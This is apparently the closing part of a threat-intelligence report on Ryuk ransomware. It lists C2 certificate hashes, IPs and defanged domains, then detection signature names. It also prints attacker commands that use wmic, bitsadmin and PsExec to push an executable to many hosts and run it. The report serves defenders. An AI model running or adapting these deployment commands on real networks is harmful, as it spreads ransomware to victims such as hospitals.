c30a4809c9a77cfc09314a63f7055bf7

3/9/20

194.26.29.229:443

CN=firstserviceupdater[.]com

bc86a3087f238014b6c3a09c2dc3df42

3/9/20

194.26.29.232:443

CN=fourthserviceupdater[.]com

3dc6d12c56cc79b0e3e8cd7b8a9c320b

3/9/20

194.26.29.234:443

CN=sixthserviceupdater[.]com

951e29ee8152c1e7f63e8ccb6b7031c1

3/9/20

194.26.29.235:443

CN=seventhserviceupdater[.]com

abe1ce0f83459a7fe9c72839fc46330b

3/9/20

194.26.29.236:443

CN=eighthserviceupdater[.]com

c7a539cffdd230a4ac9a4754c2c68f12

3/9/20

194.26.29.237:443

CN=ninethserviceupdater[.]com

1d1f7bf2c0eec7a3a0221fd473ddbafc

3/9/20

194.26.29.225:443

CN=seventeenthservicehelper[.]com

6b1e0621f4d891b8575a229384d0732d

3/9/20

194.26.29.227:443

CN=nineteenthservicehelper[.]com

38756ffb8f2962f6071e770637a2d962

3/9/20

194.26.29.242:443

CN=thirdservicehelper[.]com

3b911032d08ff4cb156c064bc272d935

3/9/20

194.26.29.244:443

CN=tenthservicehelper[.]com

a2d9b382fe32b0139197258e3e2925c4

3/9/20

194.26.29.226:443

CN=eighteenthservicehelper[.]com

4acbca8efccafd92da9006d0cc91b264

3/9/20

194.26.29.243:443

CN=ninthservicehelper[.]com

0760ab4a6ed9a124aabb8c377beead54

3/9/20

194.26.29.201:443

CN=secondservicehelper[.]com

d8a8d0ad9226e3c968c58b5d2324d899

3/9/20

194.26.29.202:443

CN=thirdservicehelper[.]com

0d3b79158ceee5b6ce859bb3fc501b02

3/9/20

194.26.29.220:443

CN=fourservicehelper[.]com

831e0445ea580091275b7020f2153b08

3/11/20

207.246.67.70:80

CN=servicesecurity[.]org

d89f6bdc59ed5a1ab3c1ecb53c6e571c

3/13/20

165.227.196.0:443

CN=twentiethservicehelper[.]com

977b4abc6307a9b3732229d4d8e2c277

3/14/20

45.141.86.91:443

CN=thirdservice-developer[.]com

edc2680e3797e11e93573e523bae7265

3/14/20

194.26.29.219:443

CN=firstservisehelper[.]com

6b444a2cd3e12d4c3feadec43a30c4d6

3/14/20

45.141.86.93:443

CN=fifthservice-developer[.]com

60e7500c809f12fe6be5681bd41a0eda

3/15/20

45.141.86.90:443

CN=secondservice-developer[.]com

de9460bd6b1badb7d8314a381d143906

3/15/20

45.141.86.84:443

CN=firstservice-developer[.]com

6385acd425e68e1d3fce3803f8ae06be

3/17/20

45.141.86.96:443

CN=eithtservice-developer[.]com

e1d1fb4a6f09fb54e09fb27167028303

3/17/20

45.141.86.92:443

CN=fourthservice-developer[.]com

5b5375bf30aedfa3a44d758fe42fccba

3/18/20

45.141.86.94:443

CN=sixthservice-developer[.]com

4d42bea1bfc7f1499e469e85cf75912c

3/18/20

108.61.209.121:443

CN=service-booster[.]com

692ed54fb1fb189c36d2f1674db47e45

3/18/20

134.122.116.114:443

CN=service-helpes[.]com

ad0914f72f1716d810e7bd8a67c12a71

3/18/20

209.97.130.197:443

CN=helpforyourservice[.]com

00fe3cc532f876c7505ddbf5625de404

3/18/20

192.241.143.121:443

CN=serviceshelps[.]com

e50998208071b4e5a70110b141542747

3/18/20

45.141.86.95:443

CN=seventhservice-developer[.]com

413ca4fa49c3eb6eef0a6cbc8cac2a71

3/18/20

198.211.116.199:443

CN=actionshunter[.]com

8e5bedbe832d374b565857cce294f061

3/18/20

45.141.86.155:443

CN=sexyservicee[.]com

cca37e58b23de9a1db9c3863fe2cd57c

3/19/20

194.26.29.239:443

CN=eleventhserviceupdater[.]com

7e0fcb78055f0eb12bc8417a6933068d

3/19/20

45.141.86.206:443

CN=servicedhunter[.]com

fdefb427dcf3f0257ddc53409ff71d22

3/19/20

45.141.86.92:443

CN=service-updateer[.]com

51ba9c03eac37751fe06b7539964e3de

3/19/20

134.122.116.59:443

CN=servicedbooster[.]com

db7797a20a5a491fb7ad0d4c84acd7e8

3/19/20

134.122.118.46:443

CN=servicedpower[.]com

7b57879bded28d0447eea28bacc79fb5

3/19/20

134.122.124.26:443

CN=serviceboostnumberone[.]com

880982d4781a1917649ce0bb6b0d9522

3/20/20

45.141.86.97:443

CN=ninethservice-developer[.]com

e4a720edfcc7467741c582cb039f20e0

3/20/20

178.62.247.205:443

CN=top-serviceupdater[.]com

a45522bd0a26e07ed18787c739179ccb

3/20/20

159.203.36.61:443

CN=yourserviceupdater[.]com

7b422c90dc85ce261c0a69ba70d8f6b5

3/20/20

134.122.20.117:443

CN=fifthserviceupdater[.]com

99aa16d7fc34cdcc7dfceab46e990f44

3/23/20

165.22.125.178:443

CN=servicemonsterr[.]com

82abfd5b55e14441997d47aee4201f6d

3/24/20

69.55.60.140:443

CN=boostyourservice[.]com

7f3787bf42f11da321461e6db7f295d1

3/24/20

45.141.86.98:443

CN=tenthservice-developer[.]com

eef29bcbcba1ce089a50aefbbb909203

3/26/20

178.79.132.82:443

CN=developmasters[.]com

5cf480eba910a625e5e52e879ac5aecb

3/26/20

194.26.29.247:443

CN=thirteenthservicehelper[.]com

2486df3869c16c0d9c23a83cd61620c2

5/4/20

159.65.216.127:443

CN=info-develop[.]com

5f7a5fb72c6689934cc5d9c9a681506b

9/22/20

69.61.38.155:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=gtrsqer[.]com

d37ba4a4b1885e96ff54d1f139bf3f47

9/22/20

96.9.225.144:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=hakunaman[.]com

4408ba9d63917446b31a0330c613843d

9/22/20

96.9.209.216:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=caonimas[.]com

d921dd1ba03aaf37d5011020577e8147

9/22/20

107.173.58.176:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=chalengges[.]com

dfeb6959b62aff0b93ca20fd40ef01a8

9/22/20

96.9.225.143:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=reginds[.]com

05c03b62dea6ec06006e57fd0a6ba22e

9/22/20

69.61.38.156:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=errvghu[.]com

c14a892f8203a04c7e3298edfc59363a

9/22/20

45.34.6.229:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=harddagger[.]com

7ed16732ec21fb3ec16dbb8df0aa2250

9/22/20

45.34.6.226:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=getinformationss[.]com

1788068aff203fa9c51d85bf32048b9c

9/22/20

45.34.6.225:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=gameleaderr[.]com

0fff2f721ad23648175d081672e77df4

9/22/20

107.173.58.185:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=razorses[.]com

b960355ba112136f93798bf85e6392bf

9/22/20

107.173.58.183:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=nomadfunclub[.]com

a3d4e6d1f361d9c335effdbd33d12e79

9/22/20

107.173.58.175:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=bouths[.]com

e13fbdff954f652f14faf11b735c0ef8

9/22/20

185.184.223.194:443

C=US,ST=CA,L=Texas,O=lol,OU=,CN=regbed[.]com

67310b30bada4f77f8f336438890d8f2

9/22/20

109.70.236.134:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=vnuret[.]com

ae74cbb9838688363b7928b06963c40a

9/23/20

64.44.131.103:443

C=US,ST=TX,L=Texas,O=serviceswork,OU=,CN=serviceswork[.]net

af518cc031807f43d646dc508685bcd3

9/23/20

69.61.38.157:443

C=US,ST=TX,L=Texas,O=office,OU=,CN=moonshardd[.]com

c8fd81d6d3c8cbb8256c470a613a7c7b

9/23/20

193.142.58.129:443

C=US,ST=TX,L=Texas,O=zapored,OU=,CN=zapored[.]com

5a22c3c8a0ed6482cad0e2b867c4c10c

9/23/20

45.34.6.223:443

C=US,ST=TX,L=Texas,O=office,OU=,CN=hurrypotter[.]com

bf598ba46f47919c264514f10ce80e34

9/23/20

107.173.58.179:443

C=US,ST=TX,L=Texas,O=office,OU=,CN=biliyilish[.]com

1c8243e2787421373efcf98fc0975031

9/23/20

45.34.6.222:443

C=US,ST=TX,L=Texas,O=dagger,OU=,CN=daggerclip[.]com

576d65a68900b270155c2015ac4788bb

9/23/20

107.173.58.180:443

C=US,ST=TX,L=Texas,O=office,OU=,CN=blackhoall[.]com

69643e9b1528efc6ec9037b60498b94c

9/23/20

107.173.58.182:443

C=US,ST=TX,L=Texas,O=office,OU=,CN=checkhunterr[.]com

ca9b7e2fcfd35f19917184ad2f5e1ad3

9/23/20

45.34.6.221:443

C=US,ST=TX,L=Texas,O=office,OU=,CN=check4list[.]com

e5e0f017b00af6f020a28b101a136bad

9/24/20

213.252.244.62:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=ayiyas[.]com

8367a1407ae999644f25f665320a3899

9/24/20

185.25.50.167:443

C=US,ST=TX,L=Texas,O=office,OU=,CN=chainnss[.]com

34a78f1233e53010d29f2a4fa944c877

9/30/20

88.119.171.75:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=martahzz[.]com

eaebbe5a3e3ea1d5992a4dfd4af7a749

10/1/20

88.119.171.74:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=jonsonsbabyy[.]com

adc8cd1285b7ae62045479ed39aa37f5

10/1/20

88.119.171.55:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=tiancaii[.]com

bfe1fd16cd4169076f3fbaab5afcbe12

10/1/20

88.119.171.67:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=cantliee[.]com

c8a623eb355d172fc3e083763934a7f7

10/1/20

88.119.171.76:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=realgamess[.]com

0ac5659596008e64d4d0d90dfb6abe7c

10/1/20

88.119.171.68:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=maybebaybe[.]com

48003b6b638dc7e79e75a581c58f2d77

10/1/20

88.119.171.69:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=saynoforbubble[.]com

5c75a6bbb7454a04b9ea26aa80dfbcba

10/1/20

88.119.171.73:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=chekingking[.]com

e391c997b757424d8b2399cba4733a60

10/1/20

88.119.171.77:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=wondergodst[.]com

035697cac0ee92bb4d743470206bfe9a

10/1/20

88.119.171.78:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=zetrexx[.]com

fc133bed713608f78f9f112ed7498f32

10/1/20

213.252.244.38:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=mountasd[.]com

8ead6021e2a5b9191577c115d4e68911

10/1/20

107.173.58.184:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=pudgeee[.]com

1c9949d20441df2df09d13778b751b65

10/1/20

88.119.174.109:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=loockfinderrs[.]com

c0ddfc954aa007885b467f8c4f70ad75

10/1/20

88.119.174.110:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=puckhunterrr[.]com

ee63098506cb82fc71a4e85043d4763f

10/1/20

88.119.174.114:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=voiddas[.]com

422b020be24b346da826172e4a2cf1c1

10/1/20

88.119.174.116:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=sibalsakie[.]com

8d8f046e963bcd008fe4bbed01bed4c8

10/1/20

88.119.174.117:443

C=US,ST=TX,L=TExas,O=lol,OU=,CN=rapirasa[.]com

c381fb63e9cb6b0fc59dfaf6e8c40af3

10/1/20

88.119.174.118:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=raidbossa[.]com

add6b742d0f992d56bede79888eef413

10/1/20

88.119.174.119:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=lindasak[.]com

9bbd073033e34bfd80f658f0264f6fae

10/1/20

88.119.174.121:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=bithunterr[.]com

9afef617897e7089f59c19096b8436c8

10/1/20

88.119.174.120:443

C=US,ST=TX,L=Texas,O=office,OU=,CN=giveasees[.]com

3f366e5f804515ff982c151a84f6a562

10/1/20

88.119.174.107:443

C=US,ST=TX,L=Texas,O=office,OU=,CN=shabihere[.]com

c2f99054e0b42363be915237cb4c950b

10/1/20

88.119.174.125:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=tarhungangster[.]com

4ac8ac12f1763277e35da08d8b9ea394

10/1/20

88.119.174.126:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=imagodd[.]com

7080547306dceb90d809cb9866ed033c

10/1/20

88.119.174.127:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=raaidboss[.]com

03037dff61500d52a37efd4b4f520518

10/1/20

88.119.174.128:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=sunofgodd[.]com

959bed7a2662d7274b303f3b120fddea

10/1/20

213.252.244.126:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=hungrrybaby[.]com

1d28556cc80df9627c20316358b625d6

10/1/20

213.252.244.170:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=loxliver[.]com

85e65803443046f921b9a0a9b8cc277c

10/1/20

213.252.246.154:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=servicegungster[.]com

9df6ba82461aa0594ead03993c0e4c42

10/5/20

5.2.64.113:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=qascker[.]com

18aadee1b82482c3cd5ebe32f3628f3f

10/7/20

5.2.79.122:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=cheapshhot[.]com

94bc44bd438d2e290516d111782badde

10/7/20

88.119.171.94:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=havemosts[.]com

f0ede92cb0899a9810a67d716cdbebe2

10/7/20

5.2.64.133:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=mixunderax[.]com

e0f9efedd11d22a5a08ffb9c4c2cbb5a

10/7/20

5.2.64.135:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=bugsbunnyy[.]com

4aa2acabeb3ff38e39ed1d840124f108

10/7/20

5.2.72.202:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=sweetmonsterr[.]com

c04034b78012cca7dcc4a0fb5d7bb551

10/7/20

88.119.175.153:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=zhameharden[.]com

2670bf08c43d995c74b4b83383af6a69

10/7/20

213.252.245.71:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=serviceboosterr[.]com

127cc347b711610c3bcee434eb8bf822

10/7/20

213.252.246.144:443

C=US,ST=TX,L=Texas,O=US,OU=,CN=servicewikii[.]com

b3e7ab478ffb0213017d57a88e7b2e3b

10/7/20

5.2.64.149:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=sobcase[.]com

188f603570e7fa81b92906af7af177dc

10/7/20

5.2.64.144:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=unlockwsa[.]com

22d7f35e624b7bcee7bb78ee85a7945c

10/7/20

88.119.174.139:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=serviceupdatter[.]com

12c6e173fa3cc11cc6b09b01c5f71b0c

10/7/20

88.119.174.133:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-boosterr[.]com

28435684c76eb5f1c4b48b6bbc4b22af

10/7/20

88.119.175.214:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=dotmaingame[.]com

9c2d64cf4e8e58ef86d16e9f77873327

10/7/20

5.2.72.200:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=wodemayaa[.]com

f6f484baf1331abf55d06720de827190

10/7/20

5.2.79.10:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=hybriqdjs[.]com

d8eacda158594331aec3ad5e42656e35

10/7/20

5.2.79.12:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=gunsdrag[.]com

29032dd12ea17fc37ffff1ee94cc5ba8

10/7/20

5.2.79.121:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=gungameon[.]com

eaf32b1c2e31e4e7b6d5c3e6ed6bff3d

10/7/20

5.2.64.174:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=quwasd[.]com

442680006c191692fcc3df64ec60d8fa

10/7/20

5.2.64.172:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=remotessa[.]com

0593cbf6b3a3736a17cd64170e02a78d

10/7/20

5.2.64.167:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=secondlivve[.]com

38df81824bd8cded4a8fa7ad9e4d1f67

10/7/20

5.2.64.182:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=luckyhunterrs[.]com

99dbe71ca7b9d4a1d9f722c733b3f405

10/7/20

88.119.171.97:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=servicesupdater[.]com

7d7199ffa40c50b6e5b025b8cb2661b2

10/7/20

88.119.171.96:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=servicemount[.]com

f433d25a0dad0def0510cd9f95886fdb

10/7/20

96.9.209.217:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=fastbloodhunter[.]com

e84c7aa593233250efac903c19f3f589

10/7/20

69.61.38.132:443

C=US,ST=CA,L=Mountainvew,O=Office,OU=,CN=kungfupandasa[.]com

e6e80f6eb5cbfc73cde40819007dcc53

10/13/20

45.147.230.131:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=bakcup-monster[.]com

4fdeab3dad077589d52684d35a9ea4ab

10/13/20

45.147.229.92:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=bakcup-checker[.]com

b70cdb49b26e6e9ba7d0c42d5f3ed3cb

10/13/20

45.147.229.68:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup-simple[.]com

57024c1fe5c4acaf30434ba1f58f9144

10/13/20

45.147.229.52:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup-leader[.]com

ec5496048f1962494d239d377e53db0c

10/13/20

45.147.229.44:443

C=US,ST=TX,L=Texsa,O=lol,OU=,CN=backup-helper[.]com

938593ac1c8bdb2c5256540d7c8476c8

10/14/20

45.147.230.87:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=nasmastrservice[.]com

cced46e0a9b6c382a97607beb95f68ab

10/14/20

45.147.230.159:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-leader[.]com

e912980fc8e9ec1e570e209ebb163f65

10/14/20

45.147.230.141:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-checker[.]com

39d7160ce331a157d3ecb2a9f8a66f12

10/14/20

45.147.230.140:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=nas-simple-helper[.]com

d9ca73fe10d52eef6952325d102f0138

10/14/20

45.147.230.133:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=nas-leader[.]com

920d04330a165882c8076c07b00e1d93

10/14/20

45.147.230.132:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=boost-servicess[.]com

771463611a43ee35a0ce0631ef244dee

10/14/20

45.147.229.180:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=elephantdrrive[.]com

1e4a794da7d3c6d0677f7169fbe3b526

10/14/20

45.147.230.159:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-leader[.]com

9c7fe10135f6ad96ded28fac51b79dfd

10/15/20

45.147.230.132:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=boost-servicess[.]com

a78c0e2920e421667ae734d923dd5ca6

10/15/20

45.138.172.95:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-hellper[.]com

a0b2378ceae498f46401aadeb278fb31

10/16/20

108.62.12.119:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=top-backuphelper[.]com

e95bb7804e3add830496bd36664ed339

10/16/20

108.62.12.105:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=best-nas[.]com

8d5dc95b3bd4d16a3434b991a09bf77e

10/16/20

108.62.12.114:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=top-backupservice[.]com

d5de2f5d2ca29da1724735cdb8fbc63f

10/16/20

108.62.12.116:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=bestservicehelper[.]com

9c7396ecd107ee8f8bf5521afabb0084

10/16/20

45.147.230.141:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-checker[.]com

1134a6f276f4297a083fc2a605e24f70

10/16/20

45.147.230.140:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=nas-simple-helper[.]com

2150045f476508f89d9a322561b28ff9

10/16/20

45.147.230.133:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=nas-leader[.]com

f4ddc4562e5001ac8fdf0b7de079b344

10/19/20

74.118.138.137:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=top3-services[.]com

75fb6789ec03961c869b52336fa4e085

10/19/20

74.118.138.115:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=simple-backupbooster[.]com

9f5e845091015b533b59fe5e8536a435

10/19/20

108.177.235.53:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=best-backup[.]com

4b78eaa4f2748df27ebf6655ea8a7fe9

10/19/20

74.118.138.138:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=topbackup-helper[.]com

bcccda483753c82e62482c55bc743c16

10/21/20

45.153.241.1:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup1helper[.]com

672c66dd4bb62047bb836bd89d2e1a65

10/21/20

45.153.240.240:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=checktodrivers[.]com

6825409698a326cc319ca40cd85a602e

10/21/20

45.153.240.194:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=driver1master[.]com

7f9be0302da88e0d322e5701d52d4128

10/21/20

45.153.240.138:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=boost-yourservice[.]com

2c6a0856d1a75b303337ac0807429e88

10/21/20

45.153.240.136:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup1master[.]com

6559dbf8c47383b7b493500d7ed76f6a

10/23/20

45.153.240.157:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=driver1updater[.]com

7bd044e0a6689ef29ce23e3ccb0736a3

10/23/20

45.153.240.178:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=service1updater[.]com

9859a8336d097bc30e6e5c7a8279f18e

10/23/20

45.153.240.220:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=driverdwl[.]com

43fb2c153b59bf46cf6f67e0ddd6ef51

10/23/20

45.153.240.222:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=viewdrivers[.]com

22bafb30cc3adaa84fef747d589ab235

10/23/20

45.153.241.134:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=backups1helper[.]com

31e87ba0c90bb38b986af297e4905e00

10/23/20

45.153.241.138:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=driver1downloads[.]com

f8a14846b7da416b14303bced5a6418f

10/23/20

45.153.241.146:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=servicehel[.]com

01abdaf870d859f9c1fd76f0b0328a2b

10/23/20

45.153.241.153:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-hel[.]com

c2eaf144e21f3aef5fe4b1502d318ba6

10/23/20

45.153.241.158:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=servicereader[.]com

de54af391602f3deea19cd5e1e912316

10/23/20

45.153.241.167:443

C=US,ST=TX,L=Texas,O=US,OU=,CN=view-backup[.]com

5f6fa19ffe5735ff81b0e7981a864dc8

10/23/20

45.147.231.222:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=top3servicebooster[.]com

ff54a7e6f51a850ef1d744d06d8e6caa

10/23/20

45.153.241.141:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=service1view[.]com

4cda9d0bece4f6156a80967298455bd5

10/26/20

74.118.138.139:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=topbackupintheworld[.]com

e317485d700bf5e8cb8eea1ec6a72a1a

10/26/20

108.62.12.12:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=topservice-masters[.]com

e0022cbf0dd5aa597fee73e79d2b5023

10/26/20

108.62.12.121:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=topservicebooster[.]com

44e7347a522b22cdf5de658a4237ce58

10/26/20

172.241.27.65:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup1services[.]com

cd3e51ee538610879d6fa77fa281bc6f

10/26/20

172.241.27.68:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=backupmaster-service[.]com

04b6aec529b3656040a68e17afdabfa4

10/26/20

172.241.27.70:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=backupmasterservice[.]com

200c25c2b93203392e1acf5d975d6544

10/26/20

45.153.241.139:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=driver-boosters[.]com

9d7c52c79f3825baf97d1318bae3ebe2

10/27/20

45.153.241.14:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=service1update[.]com

5bae28b0d0e969af2c0eda21abe91f35

10/28/20

190.211.254.154:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=driverjumper[.]com

a1e62e7e547532831d0dd07832f61f54

10/28/20

81.17.28.70:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=service1boost[.]com

67c7c75d396988ba7d6cd36f35def3e4

10/28/20

81.17.28.105:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivehepler[.]com

880e59b44e7175e62d75128accedb221

10/28/20

179.43.160.205:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivedownload[.]com

cdea09a43bef7f1679e9cd1bbeb4b657

10/28/20

179.43.158.171:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivefinder[.]com

512c6e39bf03a4240f5a2d32ee710ce5

10/28/20

179.43.133.44:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivedwn[.]com

87f3698c743f8a1296babf9fbebafa9f

10/28/20

179.43.128.5:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivecheck[.]com

6df66077378c5943453b36bd3a1ed105

10/28/20

179.43.128.3:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=idriveupdate[.]com

9706fd787a32a7e94915f91124de3ad3

10/28/20

81.17.28.122:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=idriveview[.]com

0e1b0266de2b5eaf427f5915086b4d7c

RYUK Commands

start wmic /node:@C:\share$\comps1.txt /user:[REDACTED] /password:[REDACTED] process call create "cmd.exe /c bitsadmin /transfer vVv \\[REDACTED]\share$\vVv.exe %APPDATA%\vVv.exe & %APPDATA%\vVv.exe"

start PsExec.exe /accepteula @C:\share$\comps1.txt -u [REDACTED] -p [REDACTED] cmd /c COPY "\\[REDACTED]\share$\vVv.exe" "C:\windows\temp\vVv.exe"

start PsExec.exe -d @C:\share$\comps1.txt -u [REDACTED] -p [REDACTED] cmd /c c:\windows\temp\vVv.exe

Detecting the Techniques

FireEye detects this activity across our platforms. The following table contains several specific detection names from a larger list of detections that were available prior to this activity occurring.

Platform

Signature Name

Endpoint Security

  • KEGTAP INTERACTIVE CMD.EXE CHILD PROCESS (BACKDOOR)
  • KEGTAP DLL EXECUTION VIA RUNDLL32.EXE (BACKDOOR)
  • POTENTIAL KEGTAP MALWARE ACTIVITY (BACKDOOR)
  • SINGLEMALT (DOWNLOADER)
  • STILLBOT (BACKDOOR)
  • WINEKEY (DOWNLOADER)
  • CORKBOT (BACKDOOR)

Network Security and Email Security

  • Downloader.Win.KEGTAP
  • Trojan.KEGTAP
  • APTFIN.Backdoor.Win.BEERBOT
  • APTFIN.Downloader.Win.SINGLEMALT
  • APTFIN.Backdoor.Win.STILLBOT
  • APTFIN.Downloader.Win.WINEKEY
  • APTFIN.Backdoor.Win.CORKBOT
  • FE_Downloader_Win64_KEGTAP
  • FE_APTFIN_Backdoor_Win32_BEERBOT
  • FE_APTFIN_Backdoor_Win_BEERBOT
  • FE_APTFIN_Downloader_Win32_SINGLEMALT
  • FE_APTFIN_Downloader_Win64_SINGLEMALT
  • FE_APTFIN_Backdoor_Win_STILLBOT
  • FE_APTFIN_Downloader_Win_WINEKEY
  • FE_APTFIN_Backdoor_Win_CORKBOT

More Hospitals Hit by Growing Wave of Ransomware Attacks

Hospitals in New York and Oregon were targeted on Tuesday by threat actors who crippled systems and forced ambulances with sick patients to be rerouted, in some cases.

Russian Espionage Group Updates Custom Malware Suite

Turla has outfitted a trio of backdoors with new C2 tricks and increased interop, as seen in an attack on a European government.

Welcome to ThreatPursuit VM: A Threat Intelligence and Hunting Virtual Machine

Skilled adversaries can deceive detection and often employ new measures in their tradecraft. Keeping a stringent focus on the lifecycle and evolution of adversaries allows analysts to devise new detection mechanisms and response processes. Access to the appropriate tooling and resources is critical to discover these threats within a timely and accurate manner. Therefore, we are actively compiling the most essential software packages into a Windows-based distribution: ThreatPursuit VM.

ThreatPursuit Virtual Machine (VM) is a fully customizable, open-sourced Windows-based distribution focused on threat intelligence analysis and hunting designed for intel and malware analysts as well as threat hunters to get up and running quickly. The threat intelligence analyst role is a subset and specialized member of the blue team. Individuals in this role generally have a strong impetus for knowing the threat environment. Often their traits, skills and experiences will vary depending on training and subject matter expertise.

Their expertise may not be technical and may include experiences and tradecraft earned by operating within a different domain (e.g., geospatial, criminal, signals intelligence, etc.). A key aspect of the role may include the requirement to hunt, study and triage previously undiscovered or recently emerging threats by discerning data for evil. Threat analysts apply a variety of structured analytical methods in order to develop meaningful and relevant products for their customers.

With this distribution we aim to enable users to:

  • Conduct hunting activities or missions
  • Create adversarial playbooks using evidence-based knowledge
  • Develop and apply a range of analytical products amongst datasets
  • Perform analytical pivoting across forensic artifacts and elements
